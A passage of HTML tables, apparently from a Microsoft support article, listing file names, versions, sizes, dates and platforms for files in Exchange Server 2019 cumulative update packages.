applicable</td></tr><tr><td>_search.mailboxoperators.a</td><td>15.2.659.6</td><td>290,176</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.b</td><td>15.2.659.6</td><td>290,176</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.a</td><td>15.2.659.6</td><td>485,752</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.b</td><td>15.2.659.6</td><td>485,752</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.a</td><td>15.2.659.6</td><td>113,544</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.b</td><td>15.2.659.6</td><td>113,544</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.a</td><td>15.2.659.6</td><td>67,976</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.b</td><td>15.2.659.6</td><td>67,976</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span 
class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 5</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.595.6</td><td>71,040</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,506</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,929</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.2.595.6</td><td>106,368</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.2.595.6</td><td>42,880</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.2.595.6</td><td>92,552</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,489</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>12-Aug-2020</td><td>20:41</td><td>Not 
applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.2.595.6</td><td>45,440</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.2.595.6</td><td>66,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.2.595.6</td><td>118,152</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.2.595.6</td><td>44,424</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.2.595.6</td><td>54,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.2.595.6</td><td>69,000</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.neuraltree.dll</td><td>Not applicable</td><td>694,152</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Bigfunnel.neuraltreeranking.dll</td><td>15.2.595.6</td><td>19,848</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.2.595.6</td><td>245,120</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.2.595.6</td><td>189,312</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.2.595.6</td><td>101,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.2.595.6</td><td>109,448</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.2.595.6</td><td>3,634,552</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.tracing.dll</td><td>15.2.595.6</td><td>42,880</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.2.595.6</td><td>46,472</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.2.595.6</td><td>42,880</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>
15.2.595.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.2.595.6</td><td>92,032</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,097</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,622</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,805</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,680</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,480</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.2.595.6</td><td>1,693,056</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.2.595.6</td><td>134,024</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.2.595.6</td><td>48,000</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,644</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>41,886</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>29,947</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.2.595.6</td><td>39,808</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>22,764</td><td>12-Aug-2020</td><td>20:42</td><td>Not 
applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,308</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configurecryptodefaults.ps1</td><td>Not applicable</td><td>42,039</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>19,770</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,828</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,283</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,141</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,620</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,232</td><td>12-Aug-2020</td><td>20:44</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,053</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>14,532</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Convert_distributiongrouptounifiedgroup.ps1</td><td>Not applicable</td><td>34,765</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Create_publicfoldermailboxesformigration.ps1</td><td>Not applicable</td><td>27,912</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not 
applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.common.infere
nce.dll</td><td>15.2.595.6</td><td>130,440</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.optics.dll</td><td>15.2.595.6</td><td>63,880</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>15.2.595.6</td><td>19,840</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.protocols.popimap.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.dll</td><td>15.2.595.6</td><td>108,928</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.eventlog.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.smtp.dll</td><td>15.2.595.6</td><td>51,584</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll</td><td>15.2.595.6</td><td>36,744</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.azure.dll</td><td>15.2.595.6</td><td>27,520</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.monitoringconfig.dll</td><td>15.2.595.6</td><td>1,042,304</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>15.2.595.6</td><td>29,056</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditlogpumper.messages.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.core.dll</td><td>15.2.595.6</td><td>181,120</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.messages.dll</td><td>15.2.595.6</td><td>30,080</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Micr
osoft.exchange.compliance.common.dll</td><td>15.2.595.6</td><td>22,400</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.crimsonevents.dll</td><td>15.2.595.6</td><td>85,888</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>15.2.595.6</td><td>41,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.recordreview.dll</td><td>15.2.595.6</td><td>37,256</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.supervision.dll</td><td>15.2.595.6</td><td>50,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskcreator.dll</td><td>15.2.595.6</td><td>33,152</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributioncommon.dll</td><td>15.2.595.6</td><td>1,100,168</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributionfabric.dll</td><td>15.2.595.6</td><td>206,728</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskplugins.dll</td><td>15.2.595.6</td><td>210,816</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.compression.dll</td><td>15.2.595.6</td><td>17,280</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>15.2.595.6</td><td>37,760</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.core.dll</td><td>15.2.595.6</td><td>145,792</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.core.eventlog.dll</td><td>15.2.595.6</td><td>14,216</td><td>12-Aug-2020</td><td>20:42</td>
<td>x64</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>15.2.595.6</td><td>53,120</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.eventlog.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.dll</td><td>15.2.595.6</td><td>23,416</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.failfast.dll</td><td>15.2.595.6</td><td>54,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.failfast.eventlog.dll</td><td>15.2.595.6</td><td>13,696</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>15.2.595.6</td><td>1,845,632</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>15.2.595.6</td><td>30,088</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>15.2.595.6</td><td>68,480</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.eventlog.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll</td><td>15.2.595.6</td><td>13,176</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.connectiondatacollector.dll</td><td>15.2.595.6</td><td>25,992</td
><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.common.dll</td><td>15.2.595.6</td><td>169,856</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.eas.dll</td><td>15.2.595.6</td><td>330,120</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.imap.dll</td><td>15.2.595.6</td><td>173,960</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.pop.dll</td><td>15.2.595.6</td><td>71,048</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>15.2.595.6</td><td>203,648</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.context.client.dll</td><td>15.2.595.6</td><td>27,008</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.configuration.dll</td><td>15.2.595.6</td><td>51,592</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.core.dll</td><td>15.2.595.6</td><td>51,072</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.datamodel.dll</td><td>15.2.595.6</td><td>46,984</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>15.2.595.6</td><td>1,093,496</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.timezone.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.deep.dll</td><td>15.2.595.6</td><td>326,528</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>15.2.595.6</td><td>3,352,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>15.2.595.6</td><td>35,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</
td></tr><tr><td>Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll</td><td>15.2.595.6</td><td>17,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.connectors.dll</td><td>15.2.595.6</td><td>165,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.consumermailboxprovisioning.dll</td><td>15.2.595.6</td><td>619,392</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>15.2.595.6</td><td>7,789,952</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>15.2.595.6</td><td>80,256</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>15.2.595.6</td><td>1,789,312</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.groupmailboxaccesslayer.dll</td><td>15.2.595.6</td><td>1,626,504</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ha.dll</td><td>15.2.595.6</td><td>375,176</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.imageanalysis.dll</td><td>15.2.595.6</td><td>105,848</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxfeatures.dll</td><td>15.2.595.6</td><td>15,736</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxloadbalance.dll</td><td>15.2.595.6</td><td>224,640</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>15.2.595.6</td><td>186,752</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.contracts.dll</td><td>15.2.595.6</td><td>39,816</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.dll</td><td>15.2.595.6</td><td>119,168</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft
.exchange.data.msosyncxsd.dll</td><td>15.2.595.6</td><td>968,064</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.notification.dll</td><td>15.2.595.6</td><td>141,176</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.personaldataplatform.dll</td><td>15.2.595.6</td><td>769,416</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>15.2.595.6</td><td>139,648</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.provisioning.dll</td><td>15.2.595.6</td><td>56,712</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.rightsmanagement.dll</td><td>15.2.595.6</td><td>453,000</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.scheduledtimers.dll</td><td>15.2.595.6</td><td>32,640</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>15.2.595.6</td><td>256,904</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>15.2.595.6</td><td>11,814,784</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>15.2.595.6</td><td>37,768</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.storageconfigurationresources.dll</td><td>15.2.595.6</td><td>655,752</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storeobjects.dll</td><td>15.2.595.6</td><td>175,496</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>15.2.595.6</td><td>36,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><
td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll</td><td>15.2.595.6</td><td>14,728</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>15.2.595.6</td><td>72,576</td><td>12-Aug-2020</td><td>20:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.delivery.eventlog.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.certificatelogger.dll</td><td>15.2.595.6</td><td>22,912</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>15.2.595.6</td><td>2,212,744</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.performancelogger.dll</td><td>15.2.595.6</td><td>23,928</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.common.dll</td><td>15.2.595.6</td><td>546,696</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.eventlog.dll</td><td>15.2.595.6</td><td>215,424</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exchangejobs.dll</td><td>15.2.595.6</td><td>194,440</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exe</td><td>15.2.595.6</td><td>146,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll</td><td>15.2.595.6</td><td>27,512</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregation.eventlog.dll</td><td>15.2.595.6</td><td>13,696</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregationserv
icelet.dll</td><td>15.2.595.6</td><td>49,544</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.eventlog.dll</td><td>15.2.595.6</td><td>28,032</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.exe</td><td>15.2.595.6</td><td>208,768</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.disklocker.events.dll</td><td>15.2.595.6</td><td>88,968</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.disklocker.interop.dll</td><td>15.2.595.6</td><td>32,648</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.calendarmigration.dll</td><td>15.2.595.6</td><td>45,952</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.common.dll</td><td>15.2.595.6</td><td>18,824</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.dll</td><td>15.2.595.6</td><td>473,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.ha.events.dll</td><td>15.2.595.6</td><td>206,208</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.dxstore.ha.instance.exe</td><td>15.2.595.6</td><td>36,736</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.eac.flighting.dll</td><td>15.2.595.6</td><td>131,464</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>15.2.595.6</td><td>21,888</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>15.2.595.6</td><td>148,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>15.2.595.6</td><td>220,032</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>15.2.59
